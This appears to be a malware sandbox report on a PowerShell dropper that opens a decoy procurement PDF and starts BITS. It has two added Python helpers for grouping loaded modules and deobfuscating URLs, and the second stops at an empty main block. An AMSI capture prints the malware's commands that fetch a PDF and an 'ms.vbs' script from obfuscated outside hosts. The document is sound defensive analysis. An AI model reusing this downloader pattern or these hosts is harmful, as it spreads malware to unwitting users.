      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: unknown unknown (1 child whose image and command line were not captured)
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown (8 children whose image and command line were not captured)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
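The module-load list above is long because the sandbox records one line per load, with the process image and the observation run together. Grouping the loads per process and mapping well-known modules to the capability they imply (HTTP client, TLS, BITS transfer, AMSI, WinRM/MI, Volume Shadow Copy, SAM access) makes the pattern visible at a glance: the PowerShell instances pull in the WinINet/WinHTTP/URLMon stack plus Schannel, and the svchost.exe instance loads the BITS service DLLs (qmgr.dll, bitsproxy.dll, bitsigd.dll, bitsperf.dll) next to WinHTTP and Schannel. The Python below is an added triage helper, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the fused export format shown above (with or without the trailing "Jump to behavior" link text, and also the separated "image | observation" form), groups the modules per image, and flags the capability groups. The capability-to-DLL table is the author's own shortlist of standard Windows modules, an analyst heuristic rather than anything the report asserts; the sample lines are a constructed subset copied from the observations above.

```python
import re

# Constructed sample: a subset of the "Section loaded" observations from the
# report above, in the fused form the HTML export produces (image path and
# observation run together, sometimes followed by the "Jump to behavior" text).
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
"""

# One report line: "Source: <image><kind>: <value>[Jump to behavior]".
# The image is matched lazily so it stops right before the observation kind;
# an optional " | " separator accepts the cleaned-up form as well.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)(?:\s*\|\s*)?"
    r"(?P<kind>Section loaded|File opened|Process created|Process information set):\s*"
    r"(?P<val>.*?)(?:Jump to behavior)?\s*$"
)

# Author's shortlist of standard Windows modules grouped by the capability
# their presence implies. Analyst heuristic, not something the report states.
CAPABILITY_DLLS = {
    "http client": {"winhttp.dll", "wininet.dll", "urlmon.dll", "webio.dll"},
    "tls": {"schannel.dll", "ncrypt.dll", "ncryptsslp.dll", "mskeyprotect.dll"},
    "bits transfer": {"qmgr.dll", "bitsproxy.dll", "bitsigd.dll", "bitsperf.dll"},
    "amsi scan": {"amsi.dll"},
    "winrm/mi": {"wsmsvc.dll", "wsmauto.dll", "mi.dll", "miutils.dll"},
    "shadow copy": {"vssapi.dll", "vsstrace.dll"},
    "sam access": {"samlib.dll", "samcli.dll"},
}


def parse_report_lines(text):
    """Return (image, kind, value) for every recognised observation line; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m.group("src"), m.group("kind"), m.group("val")))
    return events


def loaded_modules(events):
    """Map each process image name to the ordered, de-duplicated list of modules it loaded."""
    per_process = {}
    for src, kind, val in events:
        if kind != "Section loaded":
            continue
        image = src.rsplit("\\", 1)[-1].lower()
        mods = per_process.setdefault(image, [])
        dll = val.lower()
        if dll not in mods:
            mods.append(dll)
    return per_process


def capabilities(per_process):
    """Map each process image to the sorted capability labels its loaded modules imply."""
    result = {}
    for image, mods in per_process.items():
        present = set(mods)
        result[image] = sorted(cap for cap, dlls in CAPABILITY_DLLS.items() if present & dlls)
    return result


if __name__ == "__main__":
    loads = loaded_modules(parse_report_lines(SAMPLE_LINES))
    for image, caps in capabilities(loads).items():
        print(f"{image}: {len(loads[image])} modules -> {', '.join(caps) or 'nothing notable'}")
```

Feeding the script the full list from the report instead of the constructed subset gives the same two images with longer module lists; the point is that a second powershell.exe run and an svchost.exe with the BITS stack are visible without reading every line.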
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: scorlib.pdb_2 source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1314807939.000001FC4F31E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb] source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb3 source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdbre source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tomation.pdbt source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbX source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdbA source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.1315883159.000001FC4F59A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbw} source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ?/n.pdb source: powershell.exe, 00000003.00000002.1315104951.000001FC4F36D000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC5700BD pushad ; iretd 3_2_00007FFAAC5700C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC640D6C push eax; ret 3_2_00007FFAAC640D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'hte4iwww.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.pdf';getit -fz $flol -oulv 'http://www.bluishmaxxlasishr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use
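The AMSI buffer above captures two calls to a script-defined function, getit, each pairing a local file name (-fz) with a URL (-oulv); the function body itself is not in the fragment. The URLs are obfuscated, but comparing the encoded path segments with the plain-text local file name ('rishquirishd' beside 'Required', 'itishms' beside 'items', 'sishrvicishs' beside 'services') suggests that the substring 'ish' stands for the letter 'e'. The Python below is an added analyst helper, not part of the report or of the sample: it pulls the -oulv values out of the fragment, applies that assumed substitution, percent-decodes the path and splits out the host. The decoded host names are inferences from that rule and should be checked against the network section of the report before being used as indicators; the 'hte4i' prefix on the first URL is not resolved by the rule and is kept verbatim and reported as an unknown scheme rather than guessed at.

```python
import re
from urllib.parse import unquote

# Constructed input: the two getit calls exactly as the AMSI buffer quoted above
# records them (a space between the arguments added for readability).
AMSI_FRAGMENT = (
    "getit -fz ($fzf + 'List of Required items and services.pdf') "
    "-oulv 'hte4iwww.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.pdf';"
    "getit -fz $flol -oulv 'http://www.bluishmaxxlasishr.com/ms/ms.vbs';exit"
)

# Assumption inferred from the fragment, not stated anywhere in the report:
# every 'ish' in the obfuscated strings is a substituted 'e'.
OBFUSCATED_TOKEN = "ish"
PLAIN_TOKEN = "e"

KNOWN_SCHEMES = ("http://", "https://")


def decode_token(s):
    """Undo the assumed 'ish' -> 'e' substitution."""
    return s.replace(OBFUSCATED_TOKEN, PLAIN_TOKEN)


def find_url_arguments(fragment):
    """Return the single-quoted values passed to the script's -oulv parameter, in order."""
    return re.findall(r"-oulv\s+'([^']*)'", fragment)


def split_url(url):
    """Split a (possibly still partly obfuscated) URL into prefix, host and decoded path.

    The host is taken from the first 'www.' label onward because both URLs in the
    fragment have that shape. Whatever precedes it is the scheme prefix; if it is
    not a known scheme it is preserved as-is and flagged, not guessed.
    """
    m = re.match(r"^(?P<prefix>.*?)(?P<host>www\.[A-Za-z0-9.-]+)(?P<path>/.*)?$", url)
    if m is None:
        raise ValueError(f"unrecognised URL shape: {url!r}")
    prefix = m.group("prefix")
    return {
        "prefix": prefix,
        "scheme_known": prefix in KNOWN_SCHEMES,
        "host": m.group("host"),
        "path": unquote(m.group("path") or "/"),
    }


def extract_iocs(fragment):
    """Decode every -oulv URL in the fragment and return one record per URL."""
    records = []
    for raw in find_url_arguments(fragment):
        decoded = decode_token(raw)
        rec = {"raw": raw, "decoded": decoded}
        rec.update(split_url(decoded))
        records.append(rec)
    return records


if __name__ == "__main__":
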